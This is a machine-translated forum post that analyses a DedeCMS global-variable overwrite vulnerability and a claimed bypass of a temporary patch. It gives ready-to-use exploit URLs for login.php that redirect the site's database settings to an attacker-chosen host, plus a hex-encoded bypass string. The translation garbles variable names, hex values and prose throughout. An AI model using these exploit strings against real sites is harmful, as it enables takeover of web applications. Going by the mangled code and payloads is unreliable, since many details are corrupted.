Brief Analysis of recent dedecms kill vulnerabilities and vulnerability patch Bypass

It doesn't matter if you write an article. First, the title should be the same as that of Daniel!

Author: a flower from a single crush: t00ls reprinted, please indicate the source. If there are similarities, it is purely plagiarized by others. Hey hey!

I. Preface

I miss my wife this evening. I lost my insomnia. I went into the toast to find my friends. I was surprised that dedecms was able to kill the vulnerability, I can't help but report the vulnerability. I can see that some of my children's shoes on the Forum are still thinking about the cause of the vulnerability. While I am cooking, I know something about php, so I came here to show me the ugliness, do not spray the majority of children's shoes!

Ii. When php is used

When you try php applications to handle user submissions, the following exception occurs:

1. $ GLOBALS is a global array, which can access variables by name.
2. If register_globals is enabled, php registers the $ _ REQUEST array, that is, the user REQUEST parameters as global.
3. php will process the specific http message header in the $ _ SERVER array
4. The input parameters with the name containing the lower mark will be converted to an array, which is also the cause of this vulnerability! The first three items are just some of my summary, which may be incomplete. I hope you can add them. Some children's shoes may not very familiar with the fourth item. Let me give a simple example! Check the Code:

<? Php
Print_r ($ _ GET );
?>

Submit the http://www.bkjia.com directly/test. php? Test [dan] = 1 & test [lian] = 2, in this way, we will output Array ([test] => Array ([dan] => 1 [lian] => 2), so that an Array is nested in the $ _ GET Array, become a two-dimensional array!
3. dede Analysis
Based on the previous content, let's analyze dede. First, let's take a look at the exp given by the author. login. php? Dopost = login & validate = dcug & userid = admin & pwd = inimda & _ POST [GLOBALS] [mongo_dbhost] = 116.255.183.90 & _ POST [GLOBALS] [mongo_dbuser] = root & _ POST [GLOBALS] [mongo_dbpwd] = r0t0 & _ POST [GLOBALS] [mongo_dbname] = root, we can see the vulnerability file \ include \ common. inc. PHP file 22nd lines
Foreach ($ _ REQUEST as $ _ k => $ _ v)
{
If (strlen ($ _ k)> 0 & eregi ('^ (cfg _ | GLOBALS)', $ _ k ))
{
Exit ('request var not allow! ');
}
}

$ REQUEST variable does not filter global keywords (refer to the first one when I was pumping in php). It only verifies whether to submit and whether the submitted content contains the prefix cfg _ | GLOBALS, then we traverse the array for the first time, and the $ k of our $ _ REQUET is $ _ POST, entering the 47th rows.

Foreach (Array ('_ get',' _ Post', '_ COOKIE') as $ _ request)

{

Foreach ($ _ request as $ _ k = >$ _ v) $ {$ _ k} = _ RunMagicQuotes ($ _ v );

}

After we register the $ _ GET variable, the $ K of $ _ GET is $ _ POST. After traversing, the $ K of $ _ POST is $ _ GLOBALS, so that $ _ GLOBALS is registered,
The element pai_dbhost pai_dbuser pai_dbpwd pai_dbname in the array is assigned a value, which leads to the vulnerability!

 

Iv. vulnerability patch Bypass

See a temporary patch on a blog

Foreach (Array ('_ get',' _ Post', '_ COOKIE') as $ _ request)
{
Foreach ($ _ request as $ _ k => $ _ v ){
If (strlen ($ _ k)> 0 & eregi ('^ (cfg _ | GLOBALS)', $ _ k )){
Exit ('request var not allow! ');
}
$ {$ _ K} = _ RunMagicQuotes ($ _ v );
}
}

When traversing $ _ POST, if $ k has the GLOBALS keyword, it will be terminated. We can convert GLOBALS to hexadecimal bypass.

Login. php? Dopost = login & validate = dcug & userid = admin & pwd = admin & _ POST [login] [mongo_dbhost] = www.2cto.com & _ POST [0x474c4f1_14c53] [mongo_dbuser] = root & _ POST [0x474c4f000014c53] [pai_dbpwd] = & _ POST [0x474c4f000014c53] [pai_dbname] = dedecmsv55gbk

My local test is successful. If you are interested, you can test it!

I posted my blog too. Hey, if you are interested, please visit my Baidu blog!